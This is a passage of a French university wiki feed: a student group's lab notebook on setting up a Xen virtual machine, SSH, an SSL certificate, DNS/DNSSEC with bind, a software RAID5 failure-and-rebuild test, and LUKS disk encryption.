===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46342</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46342"/>
				<updated>2017-11-17T13:37:56Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Serveur DNS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
